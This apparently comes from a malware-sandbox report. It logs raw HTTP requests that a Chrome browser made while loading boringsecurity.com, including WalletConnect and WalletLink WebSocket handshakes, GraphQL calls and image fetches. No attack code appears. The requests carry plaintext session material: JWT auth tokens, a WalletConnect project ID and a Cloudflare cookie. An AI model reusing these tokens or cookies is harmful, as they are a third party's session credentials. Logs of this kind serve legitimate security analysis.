Source: global trafficHTTP traffic detected: GET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt1ajg3ZWNja1ZldXE1dnVrd1c4cmFFWHl4NmFZY0p0VnpkY2RreFQ4emJ0OSIsInN1YiI6IjM5ZWE1YzhlYzIzNjFkZmExNmU0ODM1NDk4YzFkOTM0ZDhlZDMzOTMxZTg0NDZjM2E0MjE3MmQxMDgzZmVjYTMiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0LmNvbSIsImlhdCI6MTcwMjIyNjY5MSwiZXhwIjoxNzAyMzEzMDkxfQ.oiuqPnF9amL8lr2fAZQhfFCpBsO8qS3ogRpu_Gup7k2XwxWMsywkxJbQcBz1sbCc15ht93gFi2-99yClj7xUBg&projectId=6fc490f91addcb4e7b2ceeabf6f0bb3b&ua=wc-2%2Fjs-2.9.2%2Fwindows10-chrome-117.0.0%2Fbrowser%3Aboringsecurity.com&useOnCloseEvent=true HTTP/1.1Host: relay.walletconnect.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://boringsecurity.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=YD94S42W_KZc1cIu43JNqSDqDzEjxJ6AqgPFYIoGAKo-1702226668-0-AcY4kZecMvVNd+2tgdWY5r22mxpAQEy0KOOmd18EKhqfPvIJVvUXHP/xzAbRSEMG58Cp6YfKrfnMAnSxgQkXDLA=Sec-WebSocket-Key: PJf6YUtHWJpvJCejPqUuAg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://boringsecurity.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: oPPn3vfc/LMt2g0A1xmHyQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
Source: global trafficHTTP traffic detected: GET /graphql/ HTTP/1.1Host: cms.boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_2048,q_75/%2Fimages%2Fbanner.jpeg?url=%2Fimages%2Fbanner.jpeg&w=2048&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt1ajg3ZWNja1ZldXE1dnVrd1c4cmFFWHl4NmFZY0p0VnpkY2RreFQ4emJ0OSIsInN1YiI6IjEyNjY0MmZkZWU0MTUyMTU4NjlhZTQ0NGNmNzkzM2YwYzFkNzRhMThjMDVhZGQzY2QxM2ZhMWUzNjlkYWYxYmYiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0Lm9yZyIsImlhdCI6MTcwMjIyNjY5MiwiZXhwIjoxNzAyMzEzMDkyfQ.1cdWlWM_k4Egl8dbgBWJwMqmYNHDEPqGfktqbR-LXzvQoayVE_WGHl-GT43OzYRqvyWdGNzrj8-v8VvzNl1SBg&projectId=6fc490f91addcb4e7b2ceeabf6f0bb3b&ua=wc-2%2Fjs-2.9.2%2Fwindows10-chrome-117.0.0%2Fbrowser%3Aboringsecurity.com&useOnCloseEvent=true HTTP/1.1Host: relay.walletconnect.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://boringsecurity.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: SebBSbLUDBhsof6UkFUlqQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
Source: global trafficHTTP traffic detected: GET /graphql/ HTTP/1.1Host: cms.boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
Source: global trafficHTTP traffic detected: GET /graphql/ HTTP/1.1Host: cms.boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
Source: global trafficHTTP traffic detected: GET /graphql/ HTTP/1.1Host: cms.boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET /graphql/ HTTP/1.1Host: cms.boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET /graphql/ HTTP/1.1Host: cms.boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
Source: global trafficHTTP traffic detected: GET /images/bs_x_murall_160.jpg HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg&w=1080&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET /graphql/ HTTP/1.1Host: cms.boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
Source: global trafficHTTP traffic detected: GET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1080&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2Fimages%2Fbrushed.jpg&w=640&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/bs_x_murall_160.jpg HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg&w=1080&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /graphql/ HTTP/1.1Host: cms.boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1080&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_640,q_75/%2Fimages%2Fbrushed.jpg?url=%2Fimages%2Fbrushed.jpg&w=640&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://boringsecurity.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: xRCod0EeMZAUT35boGIyuQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg&w=1080&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /graphql/ HTTP/1.1Host: cms.boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_Bored_Ape_Yacht_Club_Bored_Ape_Yacht_Club_3940_91e199a0b7.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_bc1_4d96972cb3.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
